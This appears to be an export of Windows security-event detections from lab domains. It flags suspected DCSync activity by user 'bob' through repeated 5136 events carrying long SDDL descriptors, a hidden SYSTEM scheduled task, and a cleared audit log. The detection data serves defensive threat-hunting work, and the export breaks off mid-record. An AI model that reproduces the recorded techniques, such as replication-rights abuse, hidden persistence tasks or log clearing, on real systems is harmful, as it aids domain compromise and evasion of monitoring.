O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD) %%14674 ",DC1.insecurebank.local,Security Dcsync Attack detected,1553549325.025627,2019-03-26T01:28:45.025627+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136," 5136 0 0 14081 0 0x8020000000000000 198242598 Security DC1.insecurebank.local 77B63738-C25C-4FBD-BA96-A7ABE17A22A3 - S-1-5-21-738609754-2819869699-4189121830-1108 bob insecurebank 0x40f2719 insecurebank.local %%14676 DC=insecurebank,DC=local C6FAF700-BFE4-452A-A766-424F84C29583 domainDNS nTSecurityDescriptor 2.5.5.15 O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD) %%14675 ",DC1.insecurebank.local,Security schedule task updated,1599047269.966623,2020-09-02T15:47:49.966623+04:00,,Audit,Low,schedule task updated by user,4702," 4702 0 0 12804 0 0x8020000000000000 2171293 Security 01566s-win16-ir.threebeesco.com S-1-5-21-308926384-506822093-3341789130-1106 a-jbrown 3B 0x21a8c68 \LMST <?xml version="1.0" encoding="UTF-16"?> <Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"> <RegistrationInfo> <Date>2020-09-02T04:47:49.74-07:00</Date> <Author>a-jbrown</Author> <Description>00304d6e</Description> <URI>\LMST</URI> </RegistrationInfo> <Triggers> <TimeTrigger> <StartBoundary>2020-02-09T04:47:48</StartBoundary> <EndBoundary>2020-02-09T04:47:58</EndBoundary> <Enabled>true</Enabled> </TimeTrigger> </Triggers> <Principals> <Principal id="Author"> <RunLevel>HighestAvailable</RunLevel> <UserId>SYSTEM</UserId> </Principal> </Principals> <Settings> <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy> <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries> <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries> <AllowHardTerminate>true</AllowHardTerminate> <StartWhenAvailable>true</StartWhenAvailable> <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable> <IdleSettings> <Duration>PT10M</Duration> <WaitTimeout>PT1H</WaitTimeout> <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle> </IdleSettings> <AllowStartOnDemand>true</AllowStartOnDemand> <Enabled>true</Enabled> <Hidden>true</Hidden> <RunOnlyIfIdle>false</RunOnlyIfIdle> <WakeToRun>false</WakeToRun> <ExecutionTimeLimit>PT72H</ExecutionTimeLimit> <Priority>7</Priority> </Settings> <Actions Context="Author"> <Exec> <Command>cmd.exe</Command> <Arguments>/c echo testing > c:\users\public\out.txt</Arguments> </Exec> </Actions> </Task> ",01566s-win16-ir.threebeesco.com,Security Dcsync Attack detected,1553549325.025627,2019-03-26T01:28:45.025627+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136," 5136 0 0 14081 0 0x8020000000000000 198242597 Security DC1.insecurebank.local 30F197FC-BECA-48D6-923E-A52A437119D3 - S-1-5-21-738609754-2819869699-4189121830-1108 bob insecurebank 0x40f2719 insecurebank.local %%14676 DC=insecurebank,DC=local C6FAF700-BFE4-452A-A766-424F84C29583 domainDNS nTSecurityDescriptor 2.5.5.15 O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD) %%14674 ",DC1.insecurebank.local,Security Dcsync Attack detected,1553549325.025627,2019-03-26T01:28:45.025627+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136," 5136 0 0 14081 0 0x8020000000000000 198242596 Security DC1.insecurebank.local 30F197FC-BECA-48D6-923E-A52A437119D3 - S-1-5-21-738609754-2819869699-4189121830-1108 bob insecurebank 0x40f2719 insecurebank.local %%14676 DC=insecurebank,DC=local C6FAF700-BFE4-452A-A766-424F84C29583 domainDNS nTSecurityDescriptor 2.5.5.15 O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD) %%14675 ",DC1.insecurebank.local,Security Audit log cleared,1639331872.272432,2021-12-12T21:57:52.272432+04:00,,Audit,Critical,Audit log cleared by user ( a-jbrown ),1102," 1102 0 4 104 0 0x4020000000000000 2982081 Security 01566s-win16-ir.threebeesco.com S-1-5-21-308926384-506822093-3341789130-1106 a-jbrown 3B 0x364f7 ",01566s-win16-ir.threebeesco.com,Security Dcsync Attack detected,1553549325.024634,2019-03-26T01:28:45.024634+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136," 5136 0 0 14081 0 0x8020000000000000 198242595 Security DC1.insecurebank.local AF3067E0-BB6F-47C2-AA20-F3F458797F38 - S-1-5-21-738609754-2819869699-4189121830-1108 bob insecurebank 0x40f2719 insecurebank.local %%14676 DC=insecurebank,DC=local C6FAF700-BFE4-452A-A766-424F84C29583 domainDNS nTSecurityDescriptor 2.5.5.15 O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa